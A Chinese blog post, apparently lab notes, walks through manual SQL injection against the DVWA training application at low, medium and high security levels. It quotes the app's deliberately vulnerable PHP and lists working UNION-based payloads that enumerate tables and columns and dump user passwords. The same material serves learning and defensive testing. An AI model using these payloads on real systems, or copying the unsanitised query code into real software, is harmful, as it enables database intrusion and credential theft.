dvwa之sql injection

最新推荐文章于 2022-11-21 00:00:27 发布
最新推荐文章于 2022-11-21 00:00:27 发布
阅读量268 收藏
点赞数
分类专栏: DVWA靶场-实验笔记
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/112796034
版权

dvwa之sql injection

lsql injection 之low等级
low,php,没有任何过滤,把sql搜索到的所有记录都输出来

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$html .=$query;//自己加进去的 方便查看注入过程
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

单引号报错了
在这里插入图片描述
在这里插入图片描述

使用1’ and ‘1’=‘1’;# 和1‘ and ‘1’=‘2’;# ,发现后一个没有输出,说明是字符型注入
在这里插入图片描述
在这里插入图片描述
看看sql语句里查询了几个参数,
1’ order by 3;# 报错了
在这里插入图片描述
1’ order by 2;#是没问题,所以查询的语句里查询了两个字段
在这里插入图片描述
看看回显了哪几个字段,两个位置都回显了~
在这里插入图片描述
database()查询当前数据库名字
在这里插入图片描述
-1‘ union select 1111,table_name from information_schema.tables where table_schema=‘dvwa’;#查询数据库dvwa里有哪些table
在这里插入图片描述
-1’ union select 1111,column_name from information_schema.columns where table_name=‘users’;# 查询出users表的所有column
在这里插入图片描述
-1’ union select last_name,password from dvwa.users;#查询dvwa数据库的users表的last_name和对应的password字段
在这里插入图片描述

sql injection 之medium等级
参数id是post的 所以用burp进行测试,发现是数字型注入,mysqli_real_escape_string()会对单引号双引号一类转义,所以在查询时 比如已经知道数据库为 dvwa 但是也不可以直接输入“dvwa”,会被转义为"dvwa",数据库会报错,而应该使用database();下一步骤的查询语句带入下一查询步骤,而不能直接带入上一步查询出的结果

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
看看sql语句里查讯了几个字段.1+order+by+2;# 在这里插入图片描述
看看回显的字段,两个位置都会回显
在这里插入图片描述

查询当前数据库名字,为dvwa
在这里插入图片描述
查询dvwa数据库里的表名, -1+union+select+111,table_name+from+information_schema.tables+where+table_schema=database();#
在这里插入图片描述
id=-1 union select 111,column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,2);#查询users表里的列名们,limit 1,2是因为users表是数据库dvwa里的第二个表
在这里插入图片描述
-1 union select last_name,password+from+users;#查询具体的内容
在这里插入图片描述

比如 Brown的密码为abc123
在这里插入图片描述
sql injection之high等级

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}

?>

1’ and 1=1;#正常 1’ and 1=2;#无显示 说明是字符型注入
在这里插入图片描述
在这里插入图片描述
查询了两个字段,3就报错了
在这里插入图片描述
-1’ union select 11111,22222;# 看回显位置
在这里插入图片描述
查当前数据库名-1’ union select 11111,database();#
在这里插入图片描述
-1’ union select 11111,table_name from information_schema.tables where table_schema=database() ;# 查表名
在这里插入图片描述
查users表里的列名, -1’ union select 11111,column_name from information_schema.columns where table_name=‘users’;#

在这里插入图片描述
-1’ union select 11111,password from users;# 查具体字段
在这里插入图片描述
sql injection结束

Alsn86
关注
专栏目录
DVWASQL Injection
小小郭的博客
01-10 219
根据自己的知识积累进行手工注入测试,若有说的不恰当的地方,还望指正~ 一、LOW等级 输入框输入单引号’,报错 证明有SQL注入 ‘ union select 1,2 # 可以看哪些数据可以回显 如果跟能回显的数据量不一样,则报错 查看所有数据库名称,'union select 1,group_concat(schema_name) from information_schema.schemata # 查看当前数据库 ,’ union select 1,database().
DVWASQL Injection (Blind)
qq_39682037的博客
03-20 2202
盲注 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Security Level: low 测试流程 输入 1 输入 1 and 1=1 输入1’ 输入 1’ and 1=1 输入 1’ and 1=2 输入1’ and length(database())=1 输入1’ and leng...
DVWASQL Injection
weixin_42075643的博客
02-19 355
SQL注入基础知识
dvwaSQL Injection
kukudeshuo的博客
03-03 238
dvwaSQL Injection Security Level: low 由源代码可知,对字符串没有进行任何过滤 输入 1' and 1=1# 结果 ID: 1' and 1=1# First name: admin Surname: admin 输入 1' and 1=2# 结果为空白,说明存在SQL注入漏洞 判断字段数 1' order by 2# 结果: ID: 1' order by 2# First name: admin Surname: admin 1' order by 3
DVWA靶场SQL InjectionSQL注入)
m0_51150495的博客
06-08 1478
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 279
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 294
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
DVWA-SQL Injection
m0_49025459的博客
04-16 1795
LOW 判断注入是否存在 1' order by 2 # 1' order by 3 # 2的时候正常回显,但是3的时候报错,证明存在两个回显点,查询数据库 1' union select 1,database() # 查到数据库之后查询,查表名 1 union select 1,table_name from information_schema.tables where table_schema=database() # 两张表,先查表里的字段语句一样,改一下表.
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA下的SQL注入
07-25
SQL
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 6333
DVWA-----SQL Injection(SQL手工注入)
dvwa-SQL Injection
Alter__的博客
05-16 730
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name,
DVWA——SQL Injection
qq_41007744的博客
05-23 397
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
DVWA系列 —— SQL injection(注入)
weixin_49340699的博客
12-14 654
SQL injection(注入)简介工具low,medium级别high级别impossible级别总结 简介 SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的 形成sql注入漏洞的原因: 1 用户输入不可控 2 输入内容被带入了SQL语句执行 通过SQL注入可以对程序对应的储存区进行对应的探测 工具 sqlmap brupsuite 环境 kali low,medium级别 第一步输入个1用brupsuite截断 在kali下使
SQL injection on DVWA (medium Level)
312小公举的专栏
05-13 2320
medium与low的区别在于对对输入的数据进行了转义处理,多了$id = mysql_real_escape_string($id);  这句。 在这里输入‘会有如下结果: 不用担心还有好多是可以用哒~~ 输入1 or 1=1: 得到了所有id对应的用户。 接下来用union select 输入 1 or 1=1 union select 1,2-- 可以正
dvwa sql injection
最新发布
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值